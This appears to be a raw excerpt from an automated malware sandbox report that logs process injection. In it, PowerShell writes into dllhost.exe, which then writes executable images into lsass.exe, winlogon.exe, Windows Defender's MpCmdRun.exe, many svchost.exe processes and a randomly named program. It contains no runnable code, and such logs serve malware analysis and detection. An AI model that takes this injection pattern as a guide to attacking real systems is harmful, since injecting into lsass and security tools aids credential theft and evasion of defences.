Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1C115C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BB497C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 220A9EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 12198470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 8B30000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 9310000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3588Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6140Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2044
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 46FD240010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F20A0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: ECCD48B010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE14340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 27C93250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227C0130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23A44F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F530850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13376160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000
